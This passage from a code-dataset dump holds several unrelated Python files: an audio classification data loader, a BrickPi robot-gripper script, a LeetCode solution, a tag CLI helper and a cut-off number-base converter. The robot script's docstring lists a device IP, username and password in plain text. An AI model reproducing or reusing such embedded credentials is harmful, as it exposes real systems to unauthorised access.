各种图表\n#**************************************************\nplt.plot(x=None,y=None) # 折线图\nplt.scatter(x=None,y=None) # 散点图\nplt.bar(x=None,height=None) # 柱形图\nplt.pie(x=None) # 饼图\nplt.hist(x=None,bins=None) # 直方图\n\n\n#**************************************************\n# 图表细节设置\n#**************************************************\nplt.title()\nplt.text()\nplt.xlabel()\nplt.xlim()\nplt.xscale()\nplt.xticks()\nplt.setp()\nplt.legend([\"Y\",\"Z\"], loc=\"upper right\") # 设置图例\nplt.grid(True)\n\n\n\n\n\n\n","sub_path":"matplotlib_pyplot.py","file_name":"matplotlib_pyplot.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"529272117","text":"#!/usr/bin/env python3\nfrom USCHeader import *\n\n\nclass USCData :\n def __init__(self, logger):\n \n self.track_duration_in_seconds=4\n self.sound_record_sampling_rate=44100\n self.track_length=self.track_duration_in_seconds*self.sound_record_sampling_rate # 4 seconds record\n self.number_of_classes=10\n self.mini_batch_size=20\n\n self.logger = logger\n self.script_dir=os.path.dirname(os.path.realpath(__file__))\n self.script_name=os.path.basename(self.script_dir)\n self.fold_dirs=['fold1','fold2','fold3','fold4','fold5','fold6','fold7','fold8','fold9','fold10']\n #self.fold_dirs=['fold1','fold10']\n #self.fold_dirs=['fold1']\n self.main_data_dir=self.script_dir+'/../../data/'\n self.raw_data_dir=self.main_data_dir+'/0.raw/UrbanSound8K/audio'\n self.np_data_dir=self.main_data_dir+'/1.np'\n # 44100 sample points per second\n \n \n \n \n self.time_slice_length=2000\n self.time_slice_overlap_length=200\n self.number_of_time_slices=math.ceil(self.track_length/(self.time_slice_length-self.time_slice_overlap_length))\n\n \n \n self.max_number_of_possible_distinct_frequencies_per_second=10\n self.generated_data_count=5000\n self.generated_data_usage_count=0\n self.generated_synthetic_data=None\n self.generate_synthetic_sample()\n self.generated_data_reset_count=0\n self.generated_data_reset_max_number=5000\n \n\n #self.mini_batch_size=40 # very slow learning\n self.fold_data_dictionary=dict()\n self.synthetic_data_file_dictionary=dict()\n self.synthetic_data_file_category_enumeration=dict()\n\n\n\n #self.mini_batch_size=40 # very slow learning\n self.fold_data_dictionary=dict()\n self.youtube_data_file_dictionary=dict()\n self.youtube_data_file_category_enumeration=dict()\n self.current_youtube_data=None\n self.youtube_data_max_category_data_file_count=0\n self.current_data_file_number=0\n self.prepareData()\n #self.findListOfYoutubeDataFiles()\n #self.youtubeDataLoaderThread=threading.Thread(target=self.youtube_data_loader_thread_worker_method, daemon=True)\n #self.youtubeDataLoaderThread.start()\n \n\n def parse_audio_files_and_save_as_np(self):\n sub4SecondSoundFilesCount=0\n for sub_dir in self.fold_dirs:\n self.logger.info(\"Parsing : \"+sub_dir)\n fold=sub_dir\n number_of_wav_files_in_fold=len(glob.glob(os.path.join(self.raw_data_dir, sub_dir, '*.wav')))\n self.logger.info(\"number_of_wav_files_in_fold : \"+str(number_of_wav_files_in_fold))\n sound_data_in_4_second=np.zeros((number_of_wav_files_in_fold,self.track_length+1),dtype=np.float32) # +1 for class number\n counter=0\n for file_path in glob.glob(os.path.join(self.raw_data_dir, sub_dir, '*.wav')):\n self.logger.info(file_path)\n try :\n classNumber=file_path.split('/')[-1].split('.')[0].split('-')[1]\n sound_data,sampling_rate=librosa.load(file_path,sr=self.sound_record_sampling_rate)\n sound_data=np.array(sound_data)\n \n #plt.plot(sound_data)\n #plt.show()\n #self.play(sound_data)\n \n sound_data_diff=self.track_length-sound_data.shape[0]\n sound_data_in_4_second[counter,int(sound_data_diff/2):int(sound_data_diff/2+sound_data.shape[0])]=sound_data\n #sound_data_in_4_second[counter,0:sound_data.shape[0]]=sound_data\n sound_data_in_4_second[counter,-1]=classNumber\n\n #plt.plot(sound_data_in_4_second[counter,0:self.track_length])\n #plt.show()\n #self.play(sound_data_in_4_second[counter,0:self.track_length])\n \n counter=counter+1 \n except :\n e = sys.exc_info()[0]\n self.logger.info (\"Exception :\")\n self.logger.info (e) \n np.save(self.np_data_dir+\"/\"+fold+\".npy\", sound_data_in_4_second) \n self.logger.info(\"sub4SecondSoundFilesCount=\"+str(sub4SecondSoundFilesCount)); \n\n\n def prepareData(self):\n self.logger.info(\"Starting to prepare the data ... \")\n if not os.path.exists(self.raw_data_dir) :\n if not os.path.exists(self.main_data_dir+'/../data/0.raw'):\n os.makedirs(self.main_data_dir+'/../data/0.raw') \n if not os.path.exists(self.main_data_dir+\"/0.raw/UrbanSound8K\"):\n if os.path.exists(self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\"):\n self.logger.info(\"Extracting \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\")\n tar = tarfile.open(self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\")\n tar.extractall(self.main_data_dir+'/../data/0.raw')\n tar.close()\n self.logger.info(\"Extracted \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\")\n else : \n self.logger.info(\"download \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz from http://serv.cusp.nyu.edu/files/jsalamon/datasets/content_loader.php?id=2 using firefox browser or chromium and re-run this script\")\n # self.logger.info(\"download \"+self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz from https://serv.cusp.nyu.edu/projects/urbansounddataset/download-urbansound8k.html using firefox browser or chromium and re-run this script\")\n exit(1)\n# http = urllib3.PoolManager()\n# chunk_size=100000\n# r = http.request('GET', 'http://serv.cusp.nyu.edu/files/jsalamon/datasets/content_loader.php?id=2', preload_content=False)\n# with open(self.main_data_dir+\"/0.raw/UrbanSound8K.tar.gz\", 'wb') as out:\n# while True:\n# data = r.read(chunk_size)\n# if not data:\n# break\n# out.write(data)\n# r.release_conn()\n\n if not os.path.exists(self.np_data_dir) :\n os.makedirs(self.np_data_dir) \n self.parse_audio_files_and_save_as_np()\n \n self.logger.info(\"Data is READY in NPY format. \")\n self.load_all_np_data_back_to_memory()\n\n\n def normalize(self,data):\n #normalized_data = data/np.linalg.norm(data) \n normalized_data = data\n if data.shape[0]>0 :\n #print(\"###########################################\")\n #print(np.amin(data))\n #print(np.amax(data))\n minimum=np.amin(data)\n maximum=np.amax(data)\n delta=maximum-minimum\n normalized_data = (data-minimum)/delta\n #print(np.amin(normalized_data))\n #print(np.amax(normalized_data))\n\n return normalized_data\n\n def one_hot_encode_array(self,arrayOfYData):\n # arrayOfYData.shape[0]==batch_size\n # all-zero for unknown class youtube data\n returnMatrix=np.zeros([arrayOfYData.shape[0],self.number_of_classes]);\n for i in range(arrayOfYData.shape[0]):\n classNumber=int(arrayOfYData[i])\n if classNumber<10 :\n returnMatrix[i,classNumber]=1\n# else :\n# let the row be all 0 (M.P.)\n return returnMatrix\n\n def similarity_array(self,arrayOfYData_1,arrayOfYData_2):\n indices=np.where(np.equal(arrayOfYData_1, arrayOfYData_2))[0]\n returnMatrix=np.zeros([arrayOfYData_1.shape[0]]);\n returnMatrix[indices]=1\n return returnMatrix\n\n def is_all_data_labeled(self,arrayOfYData):\n indices=np.where(arrayOfYData>=10)[1]\n if len(indices) > 0 :\n return 0\n return 1\n\n\n def one_hot_encode(self,classNumber):\n one_hot_encoded_class_number = np.zeros(self.number_of_classes)\n one_hot_encoded_class_number[int(classNumber)]=1\n return one_hot_encoded_class_number\n\n\n def findListOfYoutubeDataFiles(self):\n self.logger.info (\"Crawling Youtube Data Files From Directory ../../youtube/downloads/ ...\")\n if not os.path.exists('../../youtube/raw/'):\n self.logger.info(\"../../youtube/raw/ directory does not exist.\")\n self.logger.info(\"Please do the following :\")\n self.logger.info(\" 1. cd ../../youtube/\")\n self.logger.info(\" 2. ./download.sh\")\n self.logger.info(\" 3. ./convertAll.sh\")\n self.logger.info(\" 4. ./splitAll.sh\")\n self.logger.info(\" 5. python3 prepareNPYDataFiles.py\")\n exit(1);\n if len(glob.glob('../../youtube/raw/*/*.npy')) == 0:\n self.logger.info(\"../../youtube/raw/*/*.npy data files do not exist , first go to ../../youtube directory and run 'python3 prepareNPYDataFiles.py' \")\n exit(1);\n\n enum=100\n for category in glob.glob('../../youtube/raw/*/'):\n dataFileList=glob.glob(category+'/*.npy')\n if len(dataFileList) > self.youtube_data_max_category_data_file_count :\n self.youtube_data_max_category_data_file_count=len(dataFileList)\n self.youtube_data_file_dictionary[category]=random.sample(dataFileList,len(dataFileList))\n self.youtube_data_file_category_enumeration[category]=enum\n enum+=1\n self.logger.info(\"There are \"+str(enum-100)+\" categories of youtube data\")\n\n\n def getNextYoutubeData(self):\n if self.current_youtube_data is None :\n self.logger.info(\"self.current_youtube_data is None , so first loading youtube data to memory\")\n self.loadNextYoutubeData()\n returnValue=self.current_youtube_data\n self.current_youtube_data=None\n return returnValue\n\n def loadNextYoutubeData(self):\n local_youtube_data=np.empty([0,4*self.sound_record_sampling_rate+1])\n for category in self.youtube_data_file_dictionary :\n dataFileList= self.youtube_data_file_dictionary[category]\n if len(dataFileList) > self.current_data_file_number :\n #self.logger.info(\"loading\"+ category+'/data.'+str(self.current_data_file_number)+'.npy')\n loadedData=np.load(category+'/data.'+str(self.current_data_file_number)+'.npy')\n loadedData=loadedData[:,:4*self.sound_record_sampling_rate]\n newLoadedData=np.zeros((loadedData.shape[0],loadedData.shape[1]+1),dtype=np.float32)\n newLoadedData[:,:-1]=loadedData\n loadedData=newLoadedData\n #SET out of range category of current data\n\n loadedData[:,4*self.sound_record_sampling_rate]=np.full((loadedData.shape[0]),self.youtube_data_file_category_enumeration[category])\n #listOf4SecondRecords=loadedData.tolist()\n #self.logger.info(len(listOf4SecondRecords))\n local_youtube_data=np.vstack((local_youtube_data,loadedData)) ## this appends listOf4SecondRecords to local_youtube_data\n self.current_data_file_number= (self.current_data_file_number+1)%self.youtube_data_max_category_data_file_count \n np.random.shuffle(local_youtube_data)\n self.current_youtube_data=local_youtube_data\n #self.logger.info(self.current_youtube_data.shape)\n\n def youtube_data_loader_thread_worker_method(self):\n self.logger.info(\" youtube_data_loader_thread_worker_method is called \")\n while(True):\n if self.current_youtube_data is None :\n self.loadNextYoutubeData()\n else :\n time.sleep(1)\n\n def load_all_np_data_back_to_memory(self):\n self.logger.info (\"load_all_np_data_back_to_memory function started ...\")\n for fold in self.fold_dirs:\n self.logger.info (\"loading from \"+self.np_data_dir+\"/\"+fold+\".npy ...\")\n self.fold_data_dictionary[fold]=np.load(self.np_data_dir+\"/\"+fold+\".npy\")\n self.logger.info (\"load_all_np_data_back_to_memory function finished ...\")\n\n \n\n def get_fold_data(self,fold):\n return np.random.permutation(self.fold_data_dictionary[fold])\n\n def augment_speedx(self,sound_array, factor):\n \"\"\" Multiplies the sound's speed by some `factor` \"\"\"\n temp=np.copy(sound_array)\n sound_array[:]=0\n indices = np.round( np.arange(0, len(sound_array), factor) )\n indices = indices[indices < len(sound_array)].astype(int)\n result_calculated= temp[ indices.astype(int) ]\n if len(sound_array) > len(result_calculated) :\n sound_array[:len(result_calculated)]=result_calculated\n else :\n sound_array[:]=result_calculated[:len(sound_array)]\n\n\n def augment_inverse(self,sound_array):\n sound_array[:]=-sound_array\n\n def augment_volume(self,sound_array,factor):\n sound_array[:]=sound_array*factor\n \n def augment_echo(self,sound_array,echo_time):\n echo_start_index=int(echo_time*self.sound_record_sampling_rate)\n sound_array[echo_start_index:]=sound_array[echo_start_index:]+sound_array[:int(sound_array.shape[0]-echo_start_index)]/2\n\n \n def augment_translate(self,snd_array,TRANSLATION_FACTOR):\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n \"\"\" Translates the sound wave by n indices, fill the first n elements of the array with zeros \"\"\"\n snd_array[TRANSLATION_FACTOR:]=snd_array[:snd_array.shape[0]-TRANSLATION_FACTOR]\n snd_array[:TRANSLATION_FACTOR]=0\n\n\n def augment_set_zero(self,snd_array,ZERO_INDEX):\n \"\"\" Translates the sound wave by n indices, fill the first n elements of the array with zeros \"\"\"\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n snd_array[-ZERO_INDEX:]=0\n\n\n def augment_occlude(self,snd_array,OCCLUDE_START_INDEX,OCCLUDE_WIDTH):\n \"\"\" Translates the sound wave by n indices, fill the first n elements of the array with zeros \"\"\"\n snd_array[OCCLUDE_START_INDEX:OCCLUDE_START_INDEX+OCCLUDE_WIDTH]=0\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n\n\n def overlapping_slice(self,x_data,hanning=False):\n sliced_and_overlapped_data=np.zeros([self.mini_batch_size,self.number_of_time_slices,self.time_slice_length],dtype=np.float32)\n step=self.time_slice_length-self.time_slice_overlap_length\n hanning_window=np.hanning(self.time_slice_length)\n for i in range(self.mini_batch_size):\n for j in range(self.number_of_time_slices):\n step_index=j*step\n if step_index+self.time_slice_length>x_data.shape[1]:\n overlapped_time_slice=np.zeros(self.time_slice_length,dtype=np.float32)\n overlapped_time_slice[0:int(x_data.shape[1]-step_index)]=x_data[i,step_index:x_data.shape[1]]\n else :\n overlapped_time_slice=x_data[i,step_index:step_index+self.time_slice_length]\n sliced_and_overlapped_data[i,j]=overlapped_time_slice\n if hanning :\n sliced_and_overlapped_data[i,j]*=hanning_window\n \n #self.logger.info(sliced_and_overlapped_data.shape)\n #self.logger.info(sliced_and_overlapped_data[0][100][step])\n #self.logger.info(sliced_and_overlapped_data[0][101][0])\n return sliced_and_overlapped_data\n #x_input_list = tf.unstack(self.x_input_reshaped, self.number_of_time_slices, 1)\n\n def fft(self,x_data):\n #deneme_data=x_data[15][25]\n #self.logger.info(\"deneme_datae[18]=\"+str(deneme_data[18]))\n #fft_deneme_data=np.abs(np.fft.fft(deneme_data))\n #self.logger.info(\"fft_deneme_data[18]=\"+str(fft_deneme_data[18]))\n x_data = np.abs(np.fft.fft(x_data))\n #self.logger.info(\"x_data[15][25][18]=\"+str(x_data[15][25][18]))\n return x_data\n\n def convert_to_list_of_word2vec_window_sized_data(self,x_data):\n #print(x_data.shape)\n result=[]\n # Mehmet Pekmezci. : make combination \n for i in range(self.word2vec_window_size):\n row_i=x_data[:,i,:]\n x_data[:,i,:]=x_data[:,int((i+1)%self.word2vec_window_size),:]\n x_data[:,int((i+1)%self.word2vec_window_size),:]=row_i\n x_data_window=np.reshape(x_data,(self.mini_batch_size,int(self.number_of_time_slices/self.word2vec_window_size),self.word2vec_window_size,self.time_slice_length))\n ## switch axes of batch_size and parallel_lstms, then convert it to list according to first axis. --> this will give us list of matrices of shape (mini_batch_size,lstm_time_steps,time_slice_lentgh)\n x_list=np.swapaxes(x_data_window,0,1).tolist()\n result=result+x_list\n return np.random.permutation(result)\n\n def augment(self,x_data):\n ## CAUTION DO NOT CREATE A NEW ARRAY, use always x_data, because this runs in a thread.\n choice1=int(np.random.rand()*20)\n choice2=int(np.random.rand()*20)\n # 20 percent of being not augmented , if equals 0, then not augment, return directly real value\n if choice1>=6 :\n\n SPEED_FACTOR=0.8+choice1/20*0.5\n VOLUME_FACTOR=0.8+choice2/20*0.5 # 0.8 ile 1.4 kati arasi \n TRANSLATION_FACTOR=int(1000*choice1)+1\n ZERO_INDEX=int(choice2*1500)+1\n OCCLUDE_START_INDEX=int(choice1*4410)+1000\n OCCLUDE_WIDTH=int(1000*choice2)+1\n ECHO_TIME=choice1/20*3 ## 0 sn. ile 3 sn arasi echo\n \n if choice2%2 == 0 :\n self.augment_inverse(x_data)\n if choice1%2 == 1 :\n self.augment_echo(x_data,ECHO_TIME)\n\n #self.augment_speedx(x_data,SPEED_FACTOR)\n self.augment_translate(x_data,TRANSLATION_FACTOR)\n self.augment_set_zero(x_data,ZERO_INDEX)\n self.augment_occlude(x_data,OCCLUDE_START_INDEX,OCCLUDE_WIDTH)\n self.augment_volume(x_data,VOLUME_FACTOR) \n\n \n\n \n \n \n def augment_random(self,x_data):\n\n #self.play(self.augment_echo(x_data[5],2.5))\n #plt.plot(x_data[9])\n #plt.show()\n #self.play(x_data[2])\n #sys.exit(0)\n \n if self.generated_data_reset_count > self.generated_data_reset_max_number :\n self.generated_data_reset_count=0\n self.generated_data_usage_count=0\n self.generated_synthetic_data=self.generate_synthetic_sample()\n \n if (self.generated_data_usage_count+1)*self.mini_batch_size > self.generated_data_count :\n self.generated_data_reset_count=self.generated_data_reset_count+1\n self.generated_data_usage_count=0\n np.random.shuffle(self.generated_synthetic_data)\n \n augmented_data= np.copy(x_data)\n for i in range(x_data.shape[0]) :\n self.augment(augmented_data[i]) \n \n #print( \"augmented_data[7,7000]\")\n #print( augmented_data[7,7000])\n #print( x_data[7,7000])\n \n \n augmented_data=augmented_data+self.generated_synthetic_data[self.generated_data_usage_count*self.mini_batch_size:(self.generated_data_usage_count+1)*self.mini_batch_size,:]\n self.generated_data_usage_count=self.generated_data_usage_count+1\n \n \n return augmented_data\n \n def generate_synthetic_sample(self):\n \n\n if self.generated_synthetic_data is None :\n self.generated_synthetic_data=np.zeros([self.generated_data_count,self.track_length],np.float32)\n else :\n self.generated_synthetic_data.fill(0)\n# expected_cochlear_output_data=np.zeros([self.mini_batch_size,self.track_length/(self.max_number_of_possible_distinct_frequencies_per_second*self.track_duration_in_seconds),self.max_number_of_possible_distinct_frequencies_per_second*self.track_duration_in_seconds],np.float32)\n\n thread_list=[]\n for generated_data_no in range(self.generated_data_count):\n if generated_data_no % 500 == 0 :\n self.logger.info (\"Generating Data : \"+str(generated_data_no+500)+\"/\"+str(self.generated_data_count))\n for t in thread_list:\n t.join() \n thread_list=[]\n t=threading.Thread(target=self.generate_single_synthetic_sample, args=(generated_data_no,))\n t.start()\n thread_list.append(t)\n \n for t in thread_list:\n t.join() \n# expected_cochlear_output_data[batch_no,\n# return generated_synthetic_data, expected_cochlear_output_data\n\n #self.play(self.augment_echo(x_data[5],2.5))\n #plt.plot(self.generated_synthetic_data[9])\n #plt.show()\n #self.play(self.generated_synthetic_data[2])\n #sys.exit(0)\n \n self.generated_synthetic_data=self.normalize(self.generated_synthetic_data)\n \n\n \n return self.generated_synthetic_data\n \n \n def generate_single_synthetic_sample(self,generated_data_no):\n \n for time_period in range(self.track_duration_in_seconds-1):\n \n for frequency_no in range(self.max_number_of_possible_distinct_frequencies_per_second):\n randomValueFreq=np.random.gamma(2,2)\n randomValue=np.random.rand()\n #randomValueDuration=randomValue*self.track_duration_in_seconds\n randomValueDuration=randomValue\n frequency=randomValue*self.sound_record_sampling_rate+20 # this generates 10-11025 float number, from uniform dist. ( +20 = we can hear at minimum 20 hz ) \n #T=(1/frequency)*self.sound_record_sampling_rate# this generates 2-1102 float number, from uniform dist.\n volume=randomValue*10\n sine_cosine_choice=int(randomValue*2)\n #frequency_data=2*np.pi*np.arange(T)*frequency/self.sound_record_sampling_rate\n frequency_data=2*np.pi*np.arange(self.sound_record_sampling_rate*randomValueDuration+500)*frequency/self.sound_record_sampling_rate\n if sine_cosine_choice == 0 :\n wave_data = (np.sin(frequency_data)).astype(np.float32)\n else :\n wave_data = (np.cos(frequency_data)).astype(np.float32)\n wave_data=volume*wave_data\n \n start_point=int(randomValue*(self.sound_record_sampling_rate/4))+time_period*self.sound_record_sampling_rate\n \n if start_point+wave_data.shape[0] > self.track_duration_in_seconds*self.sound_record_sampling_rate :\n wave_data=wave_data[:self.track_duration_in_seconds*self.sound_record_sampling_rate-start_point]\n \n self.generated_synthetic_data[generated_data_no,start_point:start_point+wave_data.shape[0]]+=wave_data\n #self.play(self.generated_synthetic_data[generated_data_no])\n\n \n \n def play(self,sound_data):\n SOUND_RECORD_SAMPLING_RATE=self.sound_record_sampling_rate\n self.logger.info(\"sound_data.shape=\"+str(sound_data.shape))\n self.logger.info(\"SOUND_RECORD_SAMPLING_RATE=\"+str(SOUND_RECORD_SAMPLING_RATE))\n p = pyaudio.PyAudio()\n\n stream = p.open(format=pyaudio.paFloat32, channels=1, rate=SOUND_RECORD_SAMPLING_RATE, output=True)\n stream.write(sound_data[:44100],SOUND_RECORD_SAMPLING_RATE)\n stream.write(sound_data[44100:88200],SOUND_RECORD_SAMPLING_RATE)\n stream.write(sound_data[88200:132300],SOUND_RECORD_SAMPLING_RATE)\n stream.write(sound_data[122300:176400],SOUND_RECORD_SAMPLING_RATE)\n stream.stop_stream()\n stream.close()\n p.terminate()\n self.logger.info(\"Finished To Play Sound\")\n #input(\"Press Enter to continue...\")\n\n'''\n def generate_single_synthetic_sample(self,single_data):\n generated_data=single_data.copy()\n randomValue=np.random.rand()\n number_of_frequencies=int(randomValue*20)\n #print(\"generated_data[0:TIME_SLICE]=\"+str(generated_data[0:TIME_SLICE]))\n #print(\"number_of_frequencies:\"+str(number_of_frequencies))\n for i in range(number_of_frequencies):\n randomValue=np.random.rand()\n frequency=randomValue*10000 # this generates 0-10000 float number, from uniform dist.\n # frequencies between 10000-20000 is not heard well . so we ignore them. Also sampling rate 22050 only allows to detect TIME_SLICE frequency.\n duration=randomValue*4 # this generates 0-4 float number, from uniform dist.\n volume=randomValue*5\n #volume=5\n sine_cosine_choice=int(randomValue*2)\n frequency_data=2*np.pi*np.arange(88200)*frequency/22050\n if sine_cosine_choice == 0 :\n wave_data = (np.sin(frequency_data)).astype(np.float32)\n else :\n wave_data = (np.cos(frequency_data)).astype(np.float32)\n current_frequency_data=volume*wave_data\n start_point=int(randomValue*2000)\n #start_point=0\n #if start_point <= self.time_slice_length :\n # print(\"frequency-\"+str(i)+\":\"+str(frequency)+\" start_point:\"+str(start_point))\n generated_data[start_point:start_point+current_frequency_data.shape[0]]+=current_frequency_data[0:int(current_frequency_data.shape[0]-start_point)]\n #print(\"generated_data[0:TIME_SLICE]=\"+str(generated_data[0:TIME_SLICE]))\n return generated_data\n\n def augment_random(self,x_data):\n augmented_data=np.zeros([x_data.shape[0],x_data.shape[1]],np.float32)\n for i in range(x_data.shape[0]) :\n augmented_data[i]=self.generate_single_synthetic_sample(x_data[i])\n return augmented_data\n''' \n","sub_path":"src/8.1.0-MFCC-Over-CNN/USCData.py","file_name":"USCData.py","file_ext":"py","file_size_in_byte":23838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"279183693","text":"#!/usr/bin/env python\n\"\"\"The program for the 'Gipfel-Ei'-project (WI-19/20).\n\nRaspberryPi:\n - ID: 141.82.7.65\n - Name: pi\n - Password: 000\n\nThe program controls the two motors. \n\"\"\"\n\nfrom brickpi3 import BrickPi3\nimport time\n\n__author__ = 'Andreas Venturini'\n__license__ = 'MIT'\n__version__ = '1.0'\n__email__ = 'Andreas.Venturini@HS-Augsburg.DE'\n__status__ = 'Done'\n\n\nBP = BrickPi3()\na = BrickPi3().PORT_A\nb = BrickPi3().PORT_B\n\n\ndef close_gripper():\n \"\"\"Closes the gripper.\"\"\"\n BP.set_motor_position_relative(a, -45)\n time.sleep(2)\n\n\ndef move_up():\n \"\"\" Moves the gripper to the rope drum.\"\"\"\n BP.reset_motor_encoder(b)\n BP.set_motor_limits(b, power=80)\n\n BP.set_motor_position_kd(b, kd=70)\n BP.set_motor_position_kp(b, kp=70)\n BP.set_motor_position(b, 6710)\n time.sleep(17)\n\n\ndef move_down():\n \"\"\"Moves the crab back and then down.\"\"\"\n BP.reset_motor_encoder(b)\n BP.set_motor_limits(b, power=15)\n BP.set_motor_position(b, -200)\n time.sleep(2)\n\n\ndef open_gripper():\n \"\"\"Opens the gripper.\"\"\"\n BP.set_motor_power(a, 30)\n time.sleep(1)\n\n\ndef open_move_up():\n \"\"\"Moves the open gripper up.\"\"\"\n BP.reset_motor_encoder(b)\n BP.set_motor_limits(b, power=100)\n BP.set_motor_position(b, 200)\n time.sleep(2)\n\n\ndef main():\n try:\n start = time.time()\n close_gripper()\n move_up()\n move_down()\n open_gripper()\n open_move_up()\n print(\"Time: \", time.time() - start)\n\n except KeyboardInterrupt:\n print('The program was stopped manually!')\n\n finally:\n BP.reset_all()\n print('Program finished!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"509975770","text":"# https://leetcode-cn.com/problems/sliding-window-maximum/\n\n# 暴力法:O(kn)\n# 堆heap:O(nlogk), O(k)\n# 单调队列:O(n), O(k)\n\nclass Solution:\n # def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n # '''\n # 暴力法,oKN 超时了\n # '''\n # res = []\n # for i in range(len(nums)-k+1):\n # res.append(max(nums[i:i+k]))\n # return res\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n '''\n 更简洁的\n '''\n res, q = [], collections.deque()\n for i in range(len(nums)):\n if q and q[0][0] <= i - k: q.popleft()\n while q and nums[i] > q[-1][1]:\n q.pop()\n # 只要栈为空或者当前数小于栈中数,则往里添加\n q.append((i, nums[i]))\n res.append(q[0][1])\n return res[k-1:]\n \n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n '''\n 单调队列,插入元素时只插入比当前当前队列中最后一个元素更大的元素 《——错误\n 应该用单调递减栈,最大元素总在最左边\n 这样的栈满足了堆无法满足的一个条件:它是当前窗口中最大以及最左边的元素。\n '''\n res, q = [], []\n q.append((-1, float(\"inf\"))) # 哨兵元素,避免判空\n for i in range(k):\n while q[-1][1] < nums[i]: q.pop()\n q.append((i, nums[i]))\n # print(q)\n res.append(q[1][1])\n for i in range(k, len(nums)):\n if i - q[1][0] >= k : q.pop(1)\n while q[-1][1] < nums[i]: q.pop()\n q.append((i, nums[i]))\n # print(q)\n res.append(q[1][1])\n return res","sub_path":"Week_01/239. 滑动窗口最大值.py","file_name":"239. 滑动窗口最大值.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"281799456","text":"'''Arsenal client tag command line helpers.\n\nThese functions are called directly by args.func() to invoke the\nappropriate action. They also handle output formatting to the commmand\nline.\n\n'''\n#\n# Copyright 2015 CityGrid Media, LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import print_function\nimport logging\nfrom arsenalclient.cli.common import (\n ask_yes_no,\n check_resp,\n parse_cli_args,\n print_results,\n )\n\nLOG = logging.getLogger(__name__)\n\n\ndef search_tags(args, client):\n '''Search for tags and perform optional assignment actions.'''\n\n LOG.debug('action_command is: {0}'.format(args.action_command))\n LOG.debug('object_type is: {0}'.format(args.object_type))\n\n resp = None\n\n params = parse_cli_args(args.search, args.fields, args.exact_get, args.exclude)\n resp = client.tags.search(params)\n\n if not resp.get('results'):\n return resp\n\n results = resp['results']\n\n if args.audit_history:\n results = client.tags.get_audit_history(results)\n\n # switch to any if there's more than one\n if not args.set_tags:\n\n first_keys = [\n 'name',\n 'value',\n ]\n print_results(args, results, first_keys=first_keys, default_key='tag')\n\n else:\n LOG.info('Assigning tags via tag search is not implemented.')\n\n if resp:\n check_resp(resp)\n LOG.debug('Complete.')\n\ndef create_tag(args, client):\n '''Create a new tag.'''\n\n params = {\n 'name': args.tag_name,\n 'value': args.tag_value,\n }\n\n client.tags.create(params)\n\ndef delete_tag(args, client):\n '''Delete an existing tag. Requires a tag name and value.'''\n\n LOG.debug('action_command is: {0}'.format(args.action_command))\n LOG.debug('object_type is: {0}'.format(args.object_type))\n\n search = {\n 'name': args.tag_name,\n 'value': args.tag_value,\n 'exact_get': True,\n }\n\n resp = client.tags.search(search)\n\n results = resp['results']\n\n if results:\n r_names = []\n for tag in results:\n r_names.append('{0}={1}'.format(tag['name'], tag['value']))\n\n msg = 'We are ready to delete the following {0}: ' \\\n '\\n{1}\\n Continue?'.format(args.object_type, '\\n '.join(r_names))\n\n if ask_yes_no(msg, args.answer_yes):\n for tag in results:\n resp = client.tags.delete(tag)\n check_resp(resp)\n","sub_path":"client/arsenalclient/cli/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113557966","text":"import baseconvert\r\n\r\ndef convert_num_sys(number, sys_now, sys_will):\r\n\t\"\"\"Функция baseconvert.base не поддерживает отрицательные числа, поэтому нужна эта обертка.\"\"\"\r\n\tret = number\r\n\tneg = ret[0] == '-'\r\n\tif neg:\r\n\t\t\"\"\"Приходится извращаться с удалением символов при работе со строками. И че ж они del не поддерживают?\"\"\"\r\n\t\tret = ret[1:len(ret)]\r\n\tret = baseconvert.base(ret, sys_now, sys_will, string=True, recurring=False)\r\n\tif neg:\r\n\t\t\"\"\"Как удален был знак, так и должен быть восстановлен\"\"\"\r\n\t\tret = '-' + ret\r\n\tif ret[-1] == '.':\r\n\t\tret += '0'\r\n\ttry:\r\n\t\t\"\"\"Проверка на то, целое ли число\"\"\"\r\n\t\tint(ret)\r\n\texcept:\r\n\t\t\"\"\"Если число не целое, то округлить его\"\"\"\r\n\t\tif sys_will <= 10:\r\n\t\t\tret = str(round(float(ret), 8))\r\n\treturn ret\r\n\r\nallow = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',\r\n\t\t 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',\r\n\t\t 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',\r\n\t\t 'U', 'V', 'W', 'X', 'Y', 'Z']\r\ndef 